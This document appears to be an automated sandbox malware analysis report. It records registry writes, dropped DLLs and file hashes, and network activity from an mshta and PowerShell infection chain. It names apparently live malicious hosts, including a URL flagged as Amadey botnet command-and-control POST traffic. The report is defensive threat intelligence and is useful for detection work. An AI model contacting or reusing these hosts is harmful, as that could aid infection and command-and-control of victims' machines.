(PID) Process:(7072) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(732) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation:writeName:{2781761E-28E0-4109-99FE-B9D127C57AFE} {56FFCC30-D398-11D0-B2AE-00A0C908FA49} 0xFFFF
Value:
01000000000000007F7849A27D46DB01
(PID) Process:(5316) dllhost.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(4816) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(4816) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(4816) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(4816) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(4816) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
Executable files
63
Suspicious files
17
Text files
14
Unknown types
3

Dropped files

PID
Process
Filename
Type
7072mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8der
MD5:971C514F84BBA0785F80AA1C23EDFD79
SHA256:F157ED17FCAF8837FA82F8B69973848C9B10A02636848F995698212A08F31895
6332powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kjouub2m.c20.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6660powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_e4ll0wia.eby.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6332powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5u02kfe5.mnq.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6660powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mlutv3sf.vbe.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7072mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8binary
MD5:017F37A5585B8DCFDA34E5A6809903BC
SHA256:70E8B8B97C281FDA26C95D89E787E9DDC59E016F2751DC07B5790D206F396708
7072mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\z[1].mp4text
MD5:581AC1AC39C1DB67986949DD1A88E596
SHA256:850FE5FCA552CD8EEC40AFD88B540C25395D892A2D21553AF1BF0BBB5B019CF8
732powershell.exeC:\Users\admin\AppData\Local\c05faefa-d853-4462-ba71-f37c56627d5c\_xlsx.dllexecutable
MD5:74397528351ECF67517B7FC3B9278648
SHA256:CA260F024587AE1FDE8F8E17585078DF81FDA26B95D1CEF168731062A5F9C001
732powershell.exeC:\Users\admin\AppData\Local\c05faefa-d853-4462-ba71-f37c56627d5c\_wv2.dllexecutable
MD5:DA04A070869B9FE12B6734C552904BC6
SHA256:F0DF451DD298CD459BB08D3D6A316B583D70BC5D9E8D583F0EA7CA6FFD95C175
732powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jw53d5k4.jho.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
53
DNS requests
30
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
3416
svchost.exe
GET
200
69.192.161.161:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
3416
svchost.exe
GET
200
184.24.77.37:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5696
explorer.exe
POST
200
104.21.26.41:80
http://connect.resourcecloud.shop/pLQvfD4d5/index.php
unknown
malicious
6500
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
7072
mshta.exe
GET
200
142.250.186.67:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
5696
explorer.exe
POST
200
104.21.26.41:80
http://connect.resourcecloud.shop/pLQvfD4d5/index.php
unknown
malicious
6808
SIHClient.exe
GET
200
69.192.161.161:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6808
SIHClient.exe
GET
200
69.192.161.161:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4712
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3416
svchost.exe
184.24.77.37:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
3416
svchost.exe
69.192.161.161:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5064
SearchApp.exe
92.123.104.17:443
www.bing.com
Akamai International B.V.
DE
whitelisted
5064
SearchApp.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
4
System
192.168.100.255:138
whitelisted
1176
svchost.exe
40.126.32.136:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1176
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 184.24.77.37
  • 184.24.77.35
whitelisted
www.microsoft.com
  • 69.192.161.161
whitelisted
www.bing.com
  • 92.123.104.17
  • 92.123.104.13
  • 92.123.104.22
  • 92.123.104.11
  • 92.123.104.21
  • 92.123.104.63
  • 92.123.104.14
  • 92.123.104.12
  • 92.123.104.64
whitelisted
google.com
  • 142.250.181.238
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 40.126.32.136
  • 40.126.32.140
  • 40.126.32.74
  • 40.126.32.134
  • 40.126.32.68
  • 40.126.32.133
  • 40.126.32.138
  • 20.190.160.20
whitelisted
go.microsoft.com
  • 23.52.181.141
whitelisted
berb.fitnessclub-filmfanatics.com
  • 104.21.66.20
  • 172.67.155.79
unknown
c.pki.goog
  • 142.250.186.67
whitelisted

Threats

PID
Process
Class
Message
Not Suspicious Traffic
INFO [ANY.RUN] Online Pastebin Text Storage
Malware Command and Control Activity Detected
BOTNET [ANY.RUN] Amadey HTTP POST Request (st=s)
4 ETPRO signatures available at the full report
No debug info